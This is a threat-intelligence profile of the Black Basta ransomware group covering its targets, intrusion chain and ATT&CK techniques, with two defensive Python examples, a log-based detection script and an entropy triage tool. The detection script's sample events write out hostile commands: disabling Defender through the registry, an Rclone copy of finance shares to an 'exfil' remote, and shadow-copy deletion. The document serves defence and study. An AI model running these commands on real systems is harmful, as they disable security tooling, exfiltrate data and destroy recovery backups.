Black Basta | |
Other Names | BlackBasta |
Location | Unknown |
Date of initial activity | 2022 |
Suspected attribution | Unknown |
Associated Groups | Conti, BlackMatter, FIN7 (AKA Carbanak) |
Motivation | Financial Gain |
Associated tools | Common tools used by Black Basta are Qakbot, SystemBC, Mimikatz, Cobalt Strike and Rclone. |
Active | Yes |
Overview
On April 20, 2022, a user named Black Basta posted on the underground forums XSS.IS and EXPLOIT.IN advertising that the group intended to buy corporate network access credentials and monetize them for a share of the profits.
The advertisement specified that it was looking for organizations based in the United States, Canada, the United Kingdom, Australia, and New Zealand, all English-speaking countries. Reporting at the time noted that the actors bought stolen credentials from darknet marketplaces that peddle large volumes of exfiltrated data to the underground market.
Like other enterprise-focused ransomware operations, Black Basta employs a double extortion scheme that involves exfiltrating confidential data before encryption to threaten victims with public release of the stolen data.
The gang runs the extortion phase of its attacks from its Tor site, Basta News, which lists every victim that has not paid the ransom. When Black Basta appeared in April 2022, researchers suspected it was a rebrand of the Conti ransomware gang because of the overlaps between the two operations.
For example, Black Basta's data leak site closely resembled Conti's, and the two gangs shared the same victim recovery portals. Conti denied that it had rebranded as Black Basta and called the group "kids". Despite this denial, researchers still held that Conti had rebranded as Black Basta.
Common targets
Black Basta targets organizations in the US, Japan, Canada, the United Kingdom, Australia, and New Zealand in highly targeted attacks rather than employing a spray-and-pray approach.
Entities that collect large amounts of data that is attractive for extortion operations such as personally identifiable information (PII), financial information, or other sensitive data, are likely to stand out as lucrative targets for attackers.
Black Basta ransomware is observed to target industries across a wide range:
- Manufacturing
- Construction
- Transportation
- Telcos
- Pharmaceuticals
- Cosmetics
- Plumbing
- Heating
- Automobile dealers
- Undergarments manufacturers
Attack Vectors
Initial access is usually obtained through malicious links in spearphishing emails, with the tooling listed above (Qakbot, SystemBC, Mimikatz, Cobalt Strike and Rclone) recurring across intrusions.
How they operate
Black Basta often gains initial access through an emailed link to a malicious document delivered as a password-protected zip file. Once extracted and opened, the document installs the Qakbot banking trojan, which establishes backdoor access and deploys SystemBC, a proxy backdoor that opens an encrypted connection to a command-and-control server. Black Basta also commonly establishes persistence in the network with legitimate remote access software.
Cobalt Strike is then installed as the post-exploitation framework for reconnaissance and for deploying additional tooling across the network. Unlike most threat actors, Black Basta uses a wide variety of tool deployment and remote access methods.
Black Basta often tries to disable security tooling with pre-built scripts that modify registry keys. Kroll has also observed attempts to remove or disable endpoint detection and response (EDR) agents so that the deployment of tools such as Mimikatz and Cobalt Strike goes unseen.
Data exfiltration is one of Black Basta's primary objectives. Most often it is done with Rclone, whose filter rules let the operators select specific files before copying them to a cloud storage service. Once exfiltration is complete, the ransomware binary is executed: it encrypts files and appends the .basta extension, deletes volume shadow copies, and drops a ransom note named readme.txt on each infected device.
Dwell time is typically two to three days. However, an extended period of inactivity sometimes follows the initial Qakbot infection, which may indicate that the access is being sold on to associated threat actors before the ransomware operators take over.
Once Black Basta gains initial access, it deploys a range of second-stage tactics to acquire Windows Domain credentials and penetrate a target’s network laterally, steal sensitive data, and deploy ransomware.
After gaining a foothold in the target network, the operators perform the following actions:
- Reconnaissance
- Data collection
- Credential theft
- Lateral movement
- Payload download
- Payload execution
To reach the domain controller, the operators harvest credentials (Mimikatz) and map the network structure, then use PsExec to move from one machine to the next.
Once the environment is compromised, the operators take a final step to evade detection and hide their activity before the encryption phase.
Before encrypting files, the ransomware deletes volume shadow copies and other local backups with vssadmin.exe so that they cannot be used for recovery. Deployment of the ransomware to the targeted endpoints is the final stage of the attack.
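The chain above (registry edits that disable security tooling, PsExec lateral movement, Rclone exfiltration, shadow-copy deletion) is what a detection engineer would hunt for in process-creation telemetry. The following is an added example, not code from any of the reports cited on this page: it runs four rules over constructed process-creation records (host, parent image, image, command line, pipe-separated) and groups the hits per host so that a machine showing several stages of the chain stands out. The log format, the `mega:exfil` Rclone remote and the Windows Defender policy key used in the registry rule are assumptions chosen for illustration.

```python
"""Detection logic for the Black Basta post-compromise chain described above:
registry tampering that disables security tooling, PsExec lateral movement,
Rclone exfiltration and vssadmin shadow-copy deletion. Added example; the
records below are constructed, not real log lines."""
import re
from collections import defaultdict

# Constructed sample process-creation events: host|parent_image|image|command line
SAMPLE_EVENTS = r"""
WS01|explorer.exe|C:\Windows\System32\notepad.exe|notepad.exe readme.txt
WS01|cmd.exe|C:\Windows\System32\reg.exe|reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
FS02|services.exe|C:\Windows\PSEXESVC.exe|C:\Windows\PSEXESVC.exe
FS02|cmd.exe|C:\Temp\rclone.exe|rclone.exe copy D:\Shares\Finance mega:exfil --include *.xlsx --include *.pdf
FS02|cmd.exe|C:\Windows\System32\vssadmin.exe|vssadmin.exe delete shadows /all /quiet
FS02|cmd.exe|C:\Windows\System32\vssadmin.exe|vssadmin.exe list shadows
"""

# Each rule is (stage name, regex applied to "image|command line").
# The Defender policy key is one assumed example of a security-tooling registry edit.
RULES = [
    ("defense_evasion_registry",
     re.compile(r'reg(\.exe)?\s+add\s+"?HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender', re.I)),
    ("lateral_movement_psexec",          # PSEXESVC.exe is the service PsExec drops on the target host
     re.compile(r"\\PSEXESVC\.exe\|", re.I)),
    ("exfiltration_rclone",              # copy/sync/move to any remote; refine with your allowed remotes
     re.compile(r"rclone(\.exe)?\s+(copy|sync|move)\s", re.I)),
    ("impact_shadow_copy_deletion",      # 'vssadmin list shadows' alone is benign and must not fire
     re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I)),
]


def parse_event(line):
    """Split one pipe-separated record into a dict; the command line may contain '|' itself."""
    host, parent, image, cmdline = line.split("|", 3)
    return {"host": host, "parent": parent, "image": image, "cmdline": cmdline}


def detect(events):
    """Return (host, stage, command line) for every event that matches a rule."""
    hits = []
    for ev in events:
        haystack = f"{ev['image']}|{ev['cmdline']}"
        for stage, pattern in RULES:
            if pattern.search(haystack):
                hits.append((ev["host"], stage, ev["cmdline"]))
    return hits


def stages_by_host(events):
    """Group detected stages per host in first-seen order; a host with several
    stages of the chain is the one to triage first."""
    seen = defaultdict(list)
    for host, stage, _ in detect(events):
        if stage not in seen[host]:
            seen[host].append(stage)
    return dict(seen)


def load_sample():
    return [parse_event(line) for line in SAMPLE_EVENTS.strip().splitlines()]


if __name__ == "__main__":
    for host, stages in stages_by_host(load_sample()).items():
        print(host, "->", ", ".join(stages))
```

On the sample, FS02 shows three stages (PsExec service, Rclone copy, shadow-copy deletion) and WS01 one (the Defender registry edit); the `vssadmin list shadows` record is deliberately not flagged. In production the same rules map onto Sysmon Event ID 1 or Windows Security 4688 fields, and the Rclone rule should be tightened to remote names that are not sanctioned in your environment.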
Files are encrypted with the ChaCha20 stream cipher; the ChaCha20 key and nonce are in turn encrypted with an RSA public key hard-coded in the sample, so they can only be recovered with the operators' private key. Depending on file size, the malware encrypts a file fully or only partially, and the encrypted file is given the .basta extension.
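Because ChaCha20 output is indistinguishable from random bytes, the full-versus-partial encryption behaviour described above shows up in a per-window entropy profile: a fully encrypted file is high-entropy in every window, while a partially encrypted one has high-entropy windows next to untouched plaintext. The following triage helper is an added example (not code from any Black Basta analysis) that classifies files on that basis. The window size and entropy threshold are assumptions to tune against your own sample set, and the three file contents are constructed in memory, with seeded pseudo-random bytes standing in for ciphertext.

```python
"""Chunked-entropy triage for files touched by a ransomware that encrypts
files fully or partially. Added example; samples are constructed, and
pseudo-random bytes stand in for ChaCha20 output."""
import math
import random
from collections import Counter

CHUNK = 1024   # bytes per window (assumption; tune to your sample set)
HIGH = 7.0     # bits/byte above which a window is treated as ciphertext (assumption)


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte; 8.0 is the maximum for random data."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def chunk_profile(data: bytes, chunk: int = CHUNK):
    """Entropy of each fixed-size window, in file order."""
    return [shannon_entropy(data[i:i + chunk]) for i in range(0, len(data), chunk)]


def classify(data: bytes, chunk: int = CHUNK, high: float = HIGH) -> str:
    """'encrypted' if every window is high-entropy, 'partial' if only some are,
    'plaintext' if none are."""
    profile = chunk_profile(data, chunk)
    high_windows = sum(e >= high for e in profile)
    if high_windows == 0:
        return "plaintext"
    if high_windows == len(profile):
        return "encrypted"
    return "partial"


def triage(files: dict) -> dict:
    """Map file name -> verdict, as one would over *.basta files on a share."""
    return {name: classify(blob) for name, blob in files.items()}


def pseudo_random(rng: random.Random, n: int) -> bytes:
    """Seeded high-entropy bytes that stand in for stream-cipher output."""
    return bytes(rng.getrandbits(8) for _ in range(n))


# Constructed samples: a plaintext report, the same size fully replaced by
# random bytes, and a version where only the first 2 KiB was encrypted.
_rng = random.Random(1234)
PLAIN = (b"Quarterly revenue report - region north\n" * 300)[:8192]
FULL = pseudo_random(_rng, len(PLAIN))
PARTIAL = pseudo_random(_rng, 2048) + PLAIN[2048:]
SAMPLE_FILES = {
    "report.csv": PLAIN,
    "report.csv.basta": FULL,
    "ledger.csv.basta": PARTIAL,
}

if __name__ == "__main__":
    for name, verdict in triage(SAMPLE_FILES).items():
        print(f"{name}: {verdict}")
```

A partial verdict tells an incident responder that the plaintext tail may still be recoverable without the key. The check has one well-known blind spot: already-compressed or encrypted formats (zip, docx, jpeg, 7z) are high-entropy before the ransomware touches them, so pair the entropy profile with the original extension and magic bytes before drawing conclusions.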
MITRE ATT&CK Techniques
Initial Access
- Phishing (T1566)
Execution
- User Execution: Malicious File (T1204.002)
- System Services: Service Execution (T1569.002)
Persistence
- Create Accounts: Local Account (T1136.001)
Defense Evasion
- Subvert Trust Controls: Mark-of-the-Web Bypass (T1553.005)
- Use Alternate Authentication Material: Pass the Hash (T1550.002)
- Process Injection (T1055)
Credential Access
- Credentials From Password Stores (T1555)
Discovery
- System Network Connections Discovery (T1049)
- Network Share Discovery (T1135)
Command and Control
- Ingress Tool Transfer (T1105)
- Application Layer Protocol: Web Protocols (T1071.001)
- Protocol Tunnelling (T1572)
- Remote Access Software (T1219)
Privilege Escalation
- Valid Accounts (T1078)
Lateral Movement
- Remote Services: Remote Desktop Protocol (T1021.001)
- Remote Services: SMB/Windows Admin Shares (T1021.002)
- Remote Service Session Hijacking: RDP Hijacking (T1563.002)
Collection
- Data From Local System (T1005)
Significant Attacks
- In April 2022, the American Dental Association (ADA) was hit by a cyberattack that forced it to shut down portions of its network while the attack was investigated.
- German wind farm operator Deutsche Windtechnik confirmed that its IT systems were targeted by a cyberattack on the night of April 11 to 12, 2022.
- Toronto Public Library Outages Caused by Black Basta Ransomware Attack
- Chilean Government Warns of Black Basta Ransomware Attacks after Customs Incident
- Black Basta Ransomware Attack to Cost Capita over £15M
References:
- Black Basta Ransomware Emerging From Underground to Attack Corporate Networks
- Black Basta Ransomware Operators Expand Their Attack Arsenal With QakBot Trojan and PrintNightmare Exploit
- Black Basta Ransomware Gang Infiltrates Networks via QAKBOT, Brute Ratel, and Cobalt Strike
- Black Basta – Technical Analysis
- Black Basta
- HC3: Threat Profile